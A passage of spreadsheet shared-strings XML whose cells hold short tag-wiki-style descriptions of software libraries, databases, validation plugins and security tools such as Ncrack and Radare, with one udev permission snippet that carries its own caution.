Interact with data already written to Database.com by, for example, one of your Force.com applications or by your Sales Cloud application
Leverage the Database.com user security model to manage data access for your application
Extend existing Force.com applications with Java logic</t>
  </si>
  <si>
    <t>Features
Image Response Serializers
UIImage Extensions for Inflation / Scaling / Rounding / CoreImage
Single and Multi-Pass Image Filters
Auto-Purging In-Memory Image Cache
Prioritized Queue Order Image Downloading
Authentication with URLCredential
UIImageView Async Remote Downloads with Placeholders
UIImageView Filters and Transitions
Comprehensive Test Coverage
Complete Documentation
Requirements
iOS 8.0+ / macOS 10.10+ / tvOS 9.0+ / watchOS 2.0+
Xcode 8.3+
Swift 3.1+
Migration Guides
AlamofireImage 2.0 Migration Guide
AlamofireImage 3.0 Migration Guide
Dependencies
Alamofire 4.5+</t>
  </si>
  <si>
    <t>It provides a range of statistics, including user social activities, custom events, user affiliation and revenue tracking, as well as data-mining capability over the accumulated data.</t>
  </si>
  <si>
    <t>Previously, client-side validation had to be performed by custom Javascript code prior to form submission.</t>
  </si>
  <si>
    <t>Notable new features
Unified executable
Improved SMP support for SuperServer
Encrypted wire protocol
Per-database configuration
Multiple security databases
Improved SQL user management
 data type
IDENTITY support
PSQL packages
PSQL functions
DDL triggers
SQL Window (or analytical) functions
Resources
Firebird 3.0 download page
Firebird 3.0 release notes
Firebird 2.5 Language Reference
Firebird 3.0 Developer's Guide
See also firebird</t>
  </si>
  <si>
    <t>Pike is an interpreted, object-oriented, dynamic programming language with a syntax similar to C. It includes a powerful modules system that, for instance, has image manipulation, database connectivity and advanced cryptography.</t>
  </si>
  <si>
    <t>Because distributed ledgers cannot be altered after the fact, it is essential that use cases for ledger-based identity carefully consider foundational components, including performance, scale, trust model, and privacy.</t>
  </si>
  <si>
    <t>Repoze.what uses a simple User/Group/Permission model out of the box, but by writing custom authorization predicates it is easy to use whatever permissions model you want.</t>
  </si>
  <si>
    <t>When implemented with IClientValidatable and unobtrusive-validation also adds client side validation logic.</t>
  </si>
  <si>
    <t>AMP Access or AMP paywall and subscription support gives Publishers control over which content can be accessed by a Reader and with what restrictions, based on the Readers subscription status, number of views, and other factors.</t>
  </si>
  <si>
    <t>New features include C++ support, Direct3D, multiple resolutions, Micro SD card, NFC, Bluetooth, Multi-core processing, In-app purchase, text-to-speech, speech-to-text, voice commands, Wallet Hub, app2app communication,  new background functionality, contacts and calendar write-access, lock screen integration, new tile templates, new camera APIs, built-in maps control, and much more.</t>
  </si>
  <si>
    <t>Remote Validation is the ability to call a custom server-side validation method via the client-side.</t>
  </si>
  <si>
    <t>Its architecture is optimized for security, portability, and scalability (including load-balancing), making it suitable for large deployments.</t>
  </si>
  <si>
    <t>TimesTen is a high performance event-processing software component that
enables applications to capture, store, use, and distribute information in real-time,
while preserving transactional integrity and continuous availability.</t>
  </si>
  <si>
    <t>Every manager is also an employee, so it can be built a foreign key constraints between manager_employee_number to the employee_number 
Reference
Foreign key (Wikipedia)
Foreign Key Constraint on technet</t>
  </si>
  <si>
    <t>Usually, concurrent programming has to provide additional validation of correctness and robustness against uncoordinated processing units' failures, deadlocking et al, while it may -- just by a weak-coincidence -- benefit from a better resources usage (higher occupancy rate than with just a [SERIAL] arrangement of execution), which, with respect to the need of algorithmically assure the set former robustness goals, does not assure an end-to-end performance of the concurrent processing scales linearly with an amount of resources available (ref.</t>
  </si>
  <si>
    <t>References
IBM Knowledge Center - Cache invalidation
IBM Knowledge Center - Configuring near-cache invalidation
Perform trigger-based JSP cache invalidation using the Madisons starter store
About WebSphere Commerce cache invalidation (WebSphere Commerce Support)
Oracle ATG Web Commerce - Cache Invalidation Service
[HBASE-10701] Cache invalidation improvements from client side - ASF JIRA
Portal developer guide for Microsoft Dynamics CRM: Set up cache invalidation to refresh changes on the website
draft-nottingham-linked-cache-inv-00 - Linked Cache Invalidation
Cache invalidation Presentation: Jacky Lai
Advanced cache invalidation strategies for high performance websites</t>
  </si>
  <si>
    <t>Priam (available at GitHub) is a Cassandra Co-Process for backup/recovery, Token Management, and Centralized Configuration management.</t>
  </si>
  <si>
    <t>Such products may support storage and search, monitoring for security purposes, traffic visualizations, network-based forensic procedures, or statistical analysis.</t>
  </si>
  <si>
    <t>A schema can contain formulas representing integrity constraints specifically for an application and the constraints specifically for a type of database, all expressed in the same database language.</t>
  </si>
  <si>
    <t>Namespace-based Validation Dispatching Language (NVDL) is an XML schema language for validating XML documents that integrate with multiple namespaces.</t>
  </si>
  <si>
    <t>Percona XtraBackup is an open-source hot backup utility for MySQL - based servers that does not lock the database during the backup.</t>
  </si>
  <si>
    <t>Pony is an open-source, object-oriented, actor-model, capabilities-secure, high performance programming language.</t>
  </si>
  <si>
    <t>Features and Stuff
BYOS (bring your own server)
Persistent messages
Multiple rooms
Private and password-protected rooms
New message alerts / notifications
Mentions (hey @you/@all)
Image embeds / Giphy search
Code pasting
File uploads (Local / Amazon S3 / Azure)
Transcripts / chat history
XMPP Multi-user chat (MUC)
1-to-1 chat between XMPP users
Local / Kerberos / LDAP authentication
Hubot Adapter
REST-like API
Basic i18n support
MIT Licensed
Reference
The original source of the information is here, the source of the Let's Chat project in Github.</t>
  </si>
  <si>
    <t>A lightweight extendable form validation plugin for jQuery and Zepto.js.</t>
  </si>
  <si>
    <t>jqBootstrapValidation is JQuery validation plugin for bootstrap forms.</t>
  </si>
  <si>
    <t>The new features, in comparison to the version 6, include dynamic language support, compressed pointers, small language extensions, elliptic curve cryptography, new network protocols, the ability to use Strings as case values in a switch statement, and various system library extensions.</t>
  </si>
  <si>
    <t>Refers to JFace Data Binding which is a multi-threaded set of abstractions that allow for automated validation and synchronization of values between objects.</t>
  </si>
  <si>
    <t>The Credential Provider model, used by Windows Vista above, has replaced the older GINA model for implementing user authentication, allowing the user logon to be customized and integrated with the best authentication methods for the given tasks.</t>
  </si>
  <si>
    <t>Role-Based Access Control
Bonfire's User module provides a flexible User_model, ready for your users to login with, as well as a flexible RBAC that is simple to use and flexible enough to fit most needs.</t>
  </si>
  <si>
    <t>Fields of study which have influenced or been influenced by cybernetics include game theory, system theory (a mathematical counterpart to cybernetics), perceptual control theory, sociology, psychology (especially neuropsychology, behavioral psychology, cognitive psychology), philosophy, architecture, and organizational theory
See more
Cybernetics on Wikipedia</t>
  </si>
  <si>
    <t>Fields
Artificial Intelligence
Robotics
Computational Biology
Scientific Computing
Computer Architecture &amp; VLSI
Security
Database Systems
Systems and Networking
Graphics
Theory of Computing
Programming Languages
References
Software projects and development in a research environment
Research on programming language and writing software
Workflow for academic research projects, one-step builds, and the Joel Test</t>
  </si>
  <si>
    <t>Conceptual Schema (Application Model)
In the Conceptual Schema, later renamed as Application Model, entities (tables), fields, keys (indexes) and relationships are defined together with referential integrity; although this is often implemented at the database level as well as, perhaps, within Uniface.</t>
  </si>
  <si>
    <t>Using the Web-based ALSB Console or the
  Eclipse-based ALSB Plug-in for WorkSpace Studio, you configure proxy
  and business services, set up security, manage resources, and capture
  data for tracking or regulatory auditing.</t>
  </si>
  <si>
    <t>For Cloud 
To learn more about Firebase's Security API, see:
the Firebase Database documentation for Security &amp; Rules
the Firebase Storage documentation for Security &amp; Rules
the Cloud Firestore documentation for Security &amp; Rules
Related tags
firebase
firebase-database
firebase-storage
google-cloud-firestore</t>
  </si>
  <si>
    <t xml:space="preserve">
WatiN Project Page
WatiN FAQs
WatiN Test Recorder
Features include:
Automates all major HTML elements
Find elements by multiple attributes
Supports AJAX website testing
Supports frames (cross domain) and iframes
Supports popup dialogs like alert, confirm, login etc..</t>
  </si>
  <si>
    <t>Priam is a Co-Process for backup/recovery, Token Management, and Centralized Configuration management for Cassandra</t>
  </si>
  <si>
    <t>A modern and framework agnostic authorization and authentication package featuring groups, permissions, custom hashing algorithms and additional security features.</t>
  </si>
  <si>
    <t>ASP.NET Identity uses code-first Entity Framework to allow for maximum customization through class manipulation, annotation, and new fluent API.</t>
  </si>
  <si>
    <t>jquery.inputmask
Copyright (c) 2010 - 2013 Robin Herbots
Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php)
jquery.inputmask is a jquery plugin which create an input mask.</t>
  </si>
  <si>
    <t>gloox is fully compliant with the XMPP RFCs, supporting all of the XMPP features (including SRV lookups, TLS, SASL, roster management, and privacy lists), and implements several JEPs that make it ideal for writing any kind of Jabber/XMPP client or component.</t>
  </si>
  <si>
    <t>5)   Subscription API
Subscription REST API allows a subscriber to register or unregister to or from an app, send subscription notification, query subscription status and query subscriber base size.</t>
  </si>
  <si>
    <t>References
Securing Perl with Type Inference (pdf) 
The Perl Programming Language: Passing Complex Arguments
perlguts: Stashes-and-Globs
Reverse Engineering Scripting Language Extensions (pdf)</t>
  </si>
  <si>
    <t>Collects, normalizes, &amp; analyzes log data &amp; performs real-time, in-memory event correlation
Delivers immediate, actionable intelligence for security, compliance, &amp; operational issues
Includes built-in Active Responses for automated threat remediation, &amp; incident response
Provides advanced search &amp; data visualization for fast forensic analysis, &amp; anomaly detection
Streamlines compliance reporting with predefined templates for PCI, HIPAA, SOX, &amp; more
Reference: http://www.solarwinds.com/log-event-manager.aspx</t>
  </si>
  <si>
    <t>HyperDex may be
a good fit for you if your application needs to:
HyperDex's key features -- namely its rich API, strong consistency, and fault tolerance -- provide strong guarantees to applications that are not matched by other NoSQL systems.</t>
  </si>
  <si>
    <t>Free Linux and GNU/Linux Books
Advanced Linux Programming
GNU Autoconf, Automake and Libtool
GTK+/Gnome Application Development
The Linux Development Platform (PDF)
Linux Device Drivers by Jonathan Corbet, Alessandro Rubini, and Greg Kroah-Hartman
The Linux Kernel Module Programming Guide
Secure Programming for Linux and Unix
Free Linux books on Github
Common GNU/Linux distributions
Debian
Fedora
OpenSUSE
Ubuntu
Open Mandriva
Linux Mint
Slax
CentOS
Gentoo
Red Hat
Oracle Linux
Arch Linux
Elementary OS
Kali Linux
Raspbian
Distrowatch aggregates new release notices from these and hundreds of other GNU/Linux distributions, Phoronix keeps track of new GNU/Linux features and GNU/Linux Performance.</t>
  </si>
  <si>
    <t>Information hiding is the ability to prevent certain aspects of a class or software component from being accessible to its clients, using either programming language features (like private variables) or an explicit exporting policy.</t>
  </si>
  <si>
    <t>Living on the edge
There are a set of interesting links on the symfony blog about what's new in this version:
Strict Image Validation
Explicit Column Widths in Console Tables
Input and Output Stream for Processes
Web Debug Toolbar and Profiler Enhancements
Data URI Normalizer
Network mocking and DNS sensitive tests
Improved the Security Profiler Panel
DateTime Normalizer
Deprecation Helper Improvements
YAML deprecations
FrameworkBundle Improvements
Forwards and Redirects in the Toolbar and Profiler
Customizable YAML parsing and dumping</t>
  </si>
  <si>
    <t>Using the service, you can apply a flexible licensing policy on an
  application-by-application basiseach application can enforce
  licensing in the way most appropriate for it.</t>
  </si>
  <si>
    <t>Fluence is a decentralized database network that allows to deploy many existing first-class SQL/NoSQL/GraphQL databases such as SQLite or Redis into the decentralized environment.</t>
  </si>
  <si>
    <t>HttpCore supports two I/O models: blocking I/O model based on the classic Java I/O and non-blocking, event driven I/O model based on Java NIO.</t>
  </si>
  <si>
    <t>Ncrack's features include a very flexible interface granting the user
  full control of network operations, allowing for very sophisticated
  bruteforcing attacks, timing templates for ease of use, runtime
  interaction similar to Nmap's and many more.</t>
  </si>
  <si>
    <t>Some features of Keyczar include:
A simple API
Key rotation and versioning
Safe default algorithms, modes, and key lengths
Automated generation of initialization vectors and ciphertext signatures
Java, Python, C++, C# and Go implementations
Keyczar was originally developed by members of the Google Security Team and is released under an Apache 2.0 license.</t>
  </si>
  <si>
    <t>Features
Basic Form Post with a Web MVC Pattern
UpdateModel and TryUpdateModel Methods
async ActionResults
Handling Error Scenarios - Redisplaying Forms with Error Messages
Asp.Net Identity (using Code-First Entity Framework)
Bootstrap in the MVC template 
Authentication Filters
Filter overrides
Attribute Based Routing</t>
  </si>
  <si>
    <t>It includes a collection of functional application blocks addressing specific cross-cutting concerns such as data access, logging, or validation; and wiring blocks, Unity and the Interception/Policy Injection Application Block, designed to help implement more loosely coupled, testable, and maintainable software systems.</t>
  </si>
  <si>
    <t>Create a rule in /etc/udev/rules.d that will set the permissions of the device (a restart will be required):  
# navigate to rules.d directory
cd /etc/udev/rules.d
#create a new rule file
sudo touch my-newrule.rules
# open the file
sudo vim my-newrule.rules
# add the following
KERNEL=="ttyACM0", MODE="0666"
This also sets permissions for world to read and write, which you may not want to do.</t>
  </si>
  <si>
    <t>svnserve allows access to Subversion repositories using Subversion's custom network protocol.</t>
  </si>
  <si>
    <t>The Singly iOS SDK has the following supported features:
Web based authentication to over 25 different Singly supported services including Facebook, Twitter, LinkedIn, Github and more.</t>
  </si>
  <si>
    <t>Major Features
Documentation
High Quality Portable Code
Threading
Networking
Graphical User Interfaces
Numerical Algorithms
Machine Learning Algorithms
Graphical Model Inference Algorithms
Image Processing
Data Compression and Integrity Algorithms
Testing
General Utilities
Source http://dlib.net/</t>
  </si>
  <si>
    <t>Getting Started with App ID
Mobile Quality Assurance
Mobile Quality Assurance enables mobile app testing, user validation, and streamlined quality feedback with sentiment analysis, over-the-air build distribution, automated crash reporting, in-app bug reporting and user feedback.</t>
  </si>
  <si>
    <t>This new feature basically is targeting enterprises that:
Are not willing or able to load all their data into the cloud for processing or storage;
Are subject to regulatory requirements on handling customer data;
Have data that they arent comfortable sharing and processing in a cloud, regardless of security;
Have weak bandwidth or disconnected environments with high latency and TPS issues.</t>
  </si>
  <si>
    <t>HP Quality Center offers software quality assurance, including requirements management, test management and business process testing.</t>
  </si>
  <si>
    <t>It uses an automated process designed to eliminate the current complex process of manual creation, validation, signing, installation and renewal of certificates.</t>
  </si>
  <si>
    <t>Its purpose is to perform client-side form fields validation of user entered data specifically designed to use with twitter-bootstrap-3 framework.</t>
  </si>
  <si>
    <t>A comprehensive and consistent programming model for building applications that require seamless and secure communication over HTTP.</t>
  </si>
  <si>
    <t>For line of business professionals and development teams, IBM MobileFirst Quality Assurance helps prioritize mobile app quality and performance issues.</t>
  </si>
  <si>
    <t>Finally, such a strategy induces performance overheads (index on encrypted data
are useless) and forbids the use of some advanced database functionalities on the
encrypted data, like stored procedures (i.e., code stored in the DBMS which can be
shared and invoked by several applications) and triggers (i.e., code fired when
some data in the database are modified).</t>
  </si>
  <si>
    <t>New features include a "fast migration" option to migrate the data from the command-line instead of the GUI, a SSL certificate generator, improved SQL auto-completion, a new table data import and export wizard, and MySQL Enterprise Firewall support.</t>
  </si>
  <si>
    <t>Software has many different desirable quality aspects -- among them are reliability, security, maintainability, efficiency, and size; and these are all impacted by choices made by the developers.</t>
  </si>
  <si>
    <t>Ninject Interception is a Ninject Extension project which facilitates interception, a design pattern commonly used in Aspect Oriented Programming (AOP).</t>
  </si>
  <si>
    <t>Each may also have validation included by the system or even custom validation.</t>
  </si>
  <si>
    <t>PSPDFKit supports fast PDF viewing, annotating and signing of documents.PSPDFKit supports basic PDF password encryption (40bit RC4 or 128bit RC4 or AES).</t>
  </si>
  <si>
    <t>The Google Admin SDK allows developers to write applications to manage G Suite domains, migrate from and integrate with existing IT infrastructure, create users, update settings, audit activity, and more.</t>
  </si>
  <si>
    <t>A jQuery plugin to validate form fields</t>
  </si>
  <si>
    <t>Audit4j is an opensource business event auditing framework.</t>
  </si>
  <si>
    <t>It also provides additional features such as user roles and additional security features.</t>
  </si>
  <si>
    <t>Supports two-factor or higher authentication
Supports .NET 3.5, Silverlight and Windows Phone
Supports SOCKS4, SOCKS5 and HTTP Proxy</t>
  </si>
  <si>
    <t>The primary advantage to server-side scripting is the ability to highly customize the response based on the user's requirements, access rights, or queries into data stores.</t>
  </si>
  <si>
    <t>On top of CoAP
UDP and SMS transport layer support
Simple Object based resource model
Basic M2M functionalities: LWM2M Server, Access Control, Device, Connectivity, - Firmware Update, Location, Connectivity Statistics
DTLS based security
What is Eclipse Leshan?</t>
  </si>
  <si>
    <t>Glance Domain Controller - middleware that implements the main Glance
functionalities: authorization, notifications, policies, database
connections.</t>
  </si>
  <si>
    <t>Its features include caching of HTTP objects, URL rewriting (via helper apps), authentication, and SSL.</t>
  </si>
  <si>
    <t>// See the License for the specific language governing permissions and
// limitations under the License.</t>
  </si>
  <si>
    <t>See the License for the specific language governing permissions and limitations under the License.</t>
  </si>
  <si>
    <t>Additionally, PSPDFKit Annotate supports an additional layer of security with a military-grade AES256 encryption.</t>
  </si>
  <si>
    <t>Zend Framework provide the validate class to validate the forms elements.</t>
  </si>
  <si>
    <t>MVC Foolproof Validation aims to extend the Data Annotation validation provided in ASP.NET MVC.</t>
  </si>
  <si>
    <t>Form handlers evaluate the validity of form data before it is submitted in ATG applications.</t>
  </si>
  <si>
    <t>In the .NET framework, a Strong Name Key (SNK) is used to sign an assembly with a strong name.</t>
  </si>
  <si>
    <t>Symfony component which provides "validation constraints", which are simple objects containing the rules for the validation.</t>
  </si>
  <si>
    <t>includes detailed security, auto CRUD generation for your models, google charts and much more.</t>
  </si>
  <si>
    <t>Form validation refers to the validation of user-entered data in an HTML form.</t>
  </si>
  <si>
    <t>Common examples are login forms, search forms and contact forms.</t>
  </si>
  <si>
    <t>It is also possible to extend some key features, namely Authentication and Authorization, Data Validation and Data Access, by providing the Eve engine with custom objects.</t>
  </si>
  <si>
    <t xml:space="preserve">
Grails validation capability is built on Springs Validator API and data binding capabilities.</t>
  </si>
  <si>
    <t>It also includes capabilities for transparent encryption of data (TDE) as well as compression of backups.</t>
  </si>
  <si>
    <t>Create view's layouts with and without client-side validation.</t>
  </si>
  <si>
    <t>Electron Builder provides these services:
Management of NPM packages:
Native application dependencies compilation
Development dependencies are never excluded
Management of build versions
Code Signing (CI server, development machine)
Auto Update support
Multiple target platforms and distribution formats:
All platforms: 7z, zip, tar.gz, tar.xz, tar.lz, tar.bz2
MacOS: dmg, mas
Linux: AppImage, deb, rpm, apk, freebsd, pacman, p5p
Windows: NSIS, Squirrel.Windows
GitHub Releases integration for artifacts
electron-packager and appdmg are used under the hood.</t>
  </si>
  <si>
    <t>The required root CAs are:
GTS LTSR as primary
GS Root R4 as backup
Note other requirement and features for embedded devices in the long-term support (LTS) domain documentation.</t>
  </si>
  <si>
    <t>DML triggers operate on INSERT, UPDATE, and DELETE statements, and help to enforce business rules and extend data integrity when data is modified in tables or views.</t>
  </si>
  <si>
    <t>HP Quality Center offers software quality assurance, including requirements management, test management and business process testing for IT and application environments.</t>
  </si>
  <si>
    <t>This business domain model is ideally designed around user scenarios/stories or use cases, and encapsulates business, validation, and authorization rules.</t>
  </si>
  <si>
    <t>Validation Error: Value is not valid
This dreaded error will occur when roughly the following happens under the JSF covers during submitting the form:
String submittedValue = request.getParameter(component.getClientId());
Converter converter = component.getConverter();
Object selectedItem = (converter != null) ?</t>
  </si>
  <si>
    <t>Besides field/property validation OVal implements Programming by
  Contract features by utilizing AspectJ based aspects.</t>
  </si>
  <si>
    <t>EPPlus (now migrated to GitHub) supports: 
Cell Ranges
Cell Styling (Border, Color, Fill, Font, Number, Alignments, Merge)
Charts
Pictures
Shapes
Comments
Tables
Protection
Encryption
Pivot Tables
Pivot Charts
Data Validation
Format Condition
Formula calculation
VBA
Support for .NET Core 2.0 was added in EPPlus 4.5.</t>
  </si>
  <si>
    <t>mIRC is widely used, a shareware windows based client for IRC (Internet Relay Chat) written in C/C++ featuring easy to use interface, file transfers, multi-servers connection, IPv6, SSL encryption, UTF-8, UPnP, customizable sounds, spoken messages, tray notifications, message logging and much more.</t>
  </si>
  <si>
    <t>It is a 5th Generation Application Development Suite / running system/database application for [corporate enterprise] Governance, Regulation, and Compliance.</t>
  </si>
  <si>
    <t>Unity Container) is a lightweight, extensible dependency injection container for .NET with support for interception.</t>
  </si>
  <si>
    <t>Type-safe, and Fluent Query support with (runtime) validation.</t>
  </si>
  <si>
    <t>Besides the Core, Certification, Content Rendering, Design, Usability, Documentation, R&amp;D, Security and TYPO3.org teams, thousands of independent developers contribute to the CMS by submitting their extensions to the TYPO3 Extension Repository (TER).</t>
  </si>
  <si>
    <t>It includes components for Google Chart API, Google App Engine, JasperReports, jQuery, Prototype, Apache Shiro security, YUI, Dojo Toolkit and much, much more.</t>
  </si>
  <si>
    <t>It can be used to enable computers without built-in PXE support to boot from the network, or to extend an existing PXE implementation with support for additional protocols.</t>
  </si>
  <si>
    <t>The package also installs a new section where forms can be designed, form entries moderated and exported to various formats and workflow can be setup to perform actions (populate hidden fields, send email etc) when forms are entered, approved etc.</t>
  </si>
  <si>
    <t>In essence it is similar to C# XML serialization for the Java platform, but offers additional features for interception and manipulation.</t>
  </si>
  <si>
    <t>The integration with the embedded WSO2 Governance Registry or an external Registry/Repository allows the WSO2 Enterprise Service Bus to use externally defined resources for mediation, as well as save its configuration into an externally managed Registry/Repository for better SOA governance.</t>
  </si>
  <si>
    <t>In addition, System Console allows designers to create their own custom verification or demonstration tool using graphical elements, such as buttons, dials, and graphs, to represent many system-level transactions and monitor the processing of data.</t>
  </si>
  <si>
    <t>Split, concatenate, and manipulate PDF pages
Automate filling out of PDF forms
Add digital signatures to a PDF file
Typically, iText is used in projects that have one of the following requirements:
The content isn't available in advance: it's calculated based on user input or real-time database information.</t>
  </si>
  <si>
    <t>CKEditor 4 complies with industry-accepted accessibility standards and is supported in a large variety of environments, including mobile and legacy browsers.</t>
  </si>
  <si>
    <t>Implementations of Singleton may include additional features such as thread-safe initialization, or some form of initialization order.</t>
  </si>
  <si>
    <t>Barracuda makes it easier to build secure, maintainable, enterprise caliber webapps by providing better separation between templates and business logic.</t>
  </si>
  <si>
    <t>For example, an application can check the
  licensing status and then apply custom constraints that allow the user
  to run it unlicensed for a specific validity period.</t>
  </si>
  <si>
    <t>It supports a large subset of Hypertext
  Transfer Protocol features, and can be used for the following:
Working with web services (numerous PEAR packages in Web Services category are using HTTP_Request2 under the hood);
Checking the validity of web links;
Grabbing and parsing remote web pages;
Automated form submission.</t>
  </si>
  <si>
    <t>Some benefits of RoverGo include:
Schedule SQL Tasks
Security-First Design
Email Alerts
Job History
Hosted in Azure
Configurable Recurrence
Multiple Tasks
Mobile-Friendly</t>
  </si>
  <si>
    <t>This integration includes optional CSRF handling for greater security.</t>
  </si>
  <si>
    <t>See the License for the specific language governing permissions and
limitations under the License.</t>
  </si>
  <si>
    <t>It ships with built-in auto-escaping for security, and it includes integrated support for internationalization.</t>
  </si>
  <si>
    <t>The most popular plugins also have their
own tags, like jquery-validate and jquery-ui.</t>
  </si>
  <si>
    <t>Tsung scales well (its been used to simulate tens of thousands of users), it supports forms and HTTP sessions, and includes some niceties like proxy recording, thinktime support, and a choice of random or ordered traffic.</t>
  </si>
  <si>
    <t>A fallback solution that is able to use Cookies if no Web Storage is available is Lawnchair
Persistent Storage in other languages
Languages like Android-Java, Python or VBA also provide mechanisms to preserve the values of certain variables over the lifetime of the program.</t>
  </si>
  <si>
    <t>Hunchentoot provides facilities like automatic session handling (with and without cookies), logging, customizable error handling, and easy access to GET and POST parameters sent by the client.</t>
  </si>
  <si>
    <t>It supports referential integrity like adjacency lists, but also supports querying hierarchies of arbitrary depth like nested sets (also known as MPTT), smoothing out some of the difficulties inherent in each in exchange for storage space.</t>
  </si>
  <si>
    <t>Features:
PDF to text extraction
Merge PDF Documents
PDF Document Encryption/Decryption
Lucene Search Engine Integration
Fill in form data FDF and XFDF
Create a PDF from a text file
Create images from PDF pages
Print a PDF
PDF/A validation
Official Website: http://pdfbox.apache.org/
Useful Links:
Tutorials
Cookbook
FAQ
.NET Version
Mailing Lists
API Documentation</t>
  </si>
  <si>
    <t>Mass assignment is both a convenient feature and a major security concern for server-side code in web applications.</t>
  </si>
  <si>
    <t>The XWork validation framework used to run the validation rules on actions before executing the action.</t>
  </si>
  <si>
    <t>django-cache-machine is a pluggable Django app that provides automatic caching and invalidation for Django models through the ORM.</t>
  </si>
  <si>
    <t>Other features:
Text Formatting
Theme support
Flexible permissions system
Translations</t>
  </si>
  <si>
    <t>Using the CxSuite Auditor tool, you can configure your own additional queries for security, QA, and business logic purposes.</t>
  </si>
  <si>
    <t>It integrates state-of-the-art open source frameworks for resilience, caching, feature toggling, and more.</t>
  </si>
  <si>
    <t>bootstrap-validatev2.2.0
A simple Form Validation Utility for Bootstrap 3 and Bootstrap 4 not depending on jQuery.</t>
  </si>
  <si>
    <t>Declarative authorization is an example of externalized authorization whereby business logic is cleanly decoupled from authorization logic.</t>
  </si>
  <si>
    <t>It currently searches vulnerabilities like XSS, SQL and XPath injections, file inclusions, command execution, LDAP injections, CRLF injections...</t>
  </si>
  <si>
    <t>CryptoLicensing is a software for adding licensing capabilities to various forms of .net applications through code generation.</t>
  </si>
  <si>
    <t>Out of the box, xVal
lets you use jQuery Validation or ASP.NET's native client-side
validation library (a.k.a.</t>
  </si>
  <si>
    <t>WebSphere MQ Advanced Message Security extends WebSphere MQ to provide end-to-end message signing and encryption, including encryption of messages at rest.</t>
  </si>
  <si>
    <t>Although mathematically this method is impossible to break, the license file generated by Rhino Licensing can be transferred to other computers so the person who purchases a license may resell the license or release it to others over the internet.</t>
  </si>
  <si>
    <t>The validators supplied by the XWork distribution (and any custom validators) come in two different flavors:
Plain Validators (such as the ExpressionValidator) perform validation checks that are not inherently tied to a single specified field.</t>
  </si>
  <si>
    <t>References
Vulnerability Data Model: Metadatatype
Model Exchange File Format Documentation: Complex Type MetadataType
National Information Exchange Model Naming and Design Rules: metadata types
Generating XForms applications using the National Information Exchange Model (NIEM)</t>
  </si>
  <si>
    <t>Benefits over the native  function include the use of sendmail, postfix, or a custom transport layer, support for servers that require authentication, prevention of header injection attacks, support for attachments and more.</t>
  </si>
  <si>
    <t>Powerful audit trail integrated with NHibernate</t>
  </si>
  <si>
    <t>Aspects are modules implemented in an Aspect-Oriented Programming language that contain code for a cross-cutting concern, like logging or security.</t>
  </si>
  <si>
    <t>The Singly Android SDK has the following supported features:
WebView based authentication to over 25 different Singly supported services including Facebook, Twitter, LinkedIn, Github and more.</t>
  </si>
  <si>
    <t>One of the latest released Magento versions, Magento Open Source (formerly Community Edition) is an  e-commerce platform with several enhancements since version 2.0, regarding PayPal, BrainTree, interface management and several improvements for security.</t>
  </si>
  <si>
    <t>Thin is a Ruby web server that glues together 3 of the best Ruby libraries in web history:
the Mongrel parser, the root of Mongrel speed and security
Event Machine, a network I/O library with extremely high scalability, performance and stability
Rack, a minimal interface between webservers and Ruby frameworks
Which makes it, with all humility, the most secure, stable, fast and extensible Ruby web server bundled in an easy to use gem for your own pleasure.</t>
  </si>
  <si>
    <t>The latest version to the date is 2.6.2 wchich was released on 29 May 2012
Features of the software include
Social Stream
Photo Gallery
Organic user group
Custom user list
Video
Custom user profile
Event Management
Private Messaging system
External sharing
More features and pricing information at http://www.jomsocial.com</t>
  </si>
  <si>
    <t>It also provides end-to-end support for common tasks such as data validation, authentication and roles by integrating with Silverlight components on the client and ASP.NET on the mid-tier.</t>
  </si>
  <si>
    <t>From the official website:
Radare is a LGPL portable reversing framework that can:
Disassemble (and assemble for) many different architectures
Debug natively or use remote targets (gdb, r2pipe, winedbg, windbg)
Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku
Perform forensics on filesystems and data carving
Be scripted in Python, Javascript, Go and more
Support collaborative analysis using the embedded webserver
Visualize data structures of several file types
Patch programs to uncover new features or fix vulnerabilities
Use powerful analysis capabilities to speed up reversing
Aid in software exploitation
Related Resources
Documentation
Community
Comparison to other tools</t>
  </si>
  <si>
    <t>Castle validator component is an open source validation framework that uses property attribute to specify validation rules on class.</t>
  </si>
  <si>
    <t>You can configure JSCS for your project in detail using over 90 validation rules, including presets from popular style guides like jQuery, Airbnb, Google, and more.</t>
  </si>
  <si>
    <t>Enhanced support for different authorization methods - Role based access control, attribute based access control etc.</t>
  </si>
  <si>
    <t>IBM InfoSphere Platform provides all the foundational building blocks of trusted information, including data integration, data warehousing, master data management, big data and information governance.</t>
  </si>
  <si>
    <t>It is intended to reduce the effectiveness of certain types of search engine spam, thereby improving the quality of search engine results and preventing spamdexing from occurring.</t>
  </si>
  <si>
    <t>FastFlow is a parallel programming framework for multi-core platforms based upon non-blocking lock-free/fence-free synchronization mechanisms.</t>
  </si>
  <si>
    <t>OCMockito is an Objective-C implementation of Mockito, supporting creation, verification and stubbing of mock objects.</t>
  </si>
  <si>
    <t>It is integrated into both Firebase and Google Cloud Platform, which provide security features and other integrations for building serverless apps.</t>
  </si>
  <si>
    <t>Windows does not restrict TPM functionality and makes all TPM provided functionality available through the TPM Based Services (TBS) and supports selected functionality with the CNG Platform Crypto Provider and features like BitLocker and Windows Entropy Seeding.</t>
  </si>
  <si>
    <t>App Engine Modules is a feature that lets developers factor large applications into logical components that can share stateful services and communicate in a secure fashion.</t>
  </si>
  <si>
    <t>In computing, an abstraction layer or abstraction level is a way of hiding the implementation details of a particular set of functionality, allowing the separation of concerns to facilitate interoperability and platform independence.</t>
  </si>
  <si>
    <t>Zenoss Core provides the following capabilities:
Monitoring availability of network devices using SNMP, SSH, WMI
Monitoring of network services (HTTP, POP3, NNTP, SNMP, FTP)
Monitoring of host resources (processor, disk usage) on most network operating systems.</t>
  </si>
  <si>
    <t>It's built on other tools created by its publisher, WSO2, such as WSO2 Enterprise Service Bus, WSO2 Identity Server, WSO2 Business Activity Monitor, and WSO2 Governance Registry.</t>
  </si>
  <si>
    <t>Built.io Backend features a complete set of functionality, such as:
Data storage
Advanced queries on your data
File Storage
ACLs (Access Control Lists) for security of your data and files
Analytics
Webhooks, as an integration mechanism
Push Notifications to iOS and Android devices
CMS
Official API Documentation
Built.io Flow Enterprise Docs
Built.io Flow Express Docs
Built.io Contentstack Docs
Built.io Backend Docs
built.io Forum/Community
Forum/Community</t>
  </si>
  <si>
    <t>To get the full functionality of a IEEE 802.15.4 network, including for example support for RFD's and beacon mode communication, you need a coordinator.</t>
  </si>
  <si>
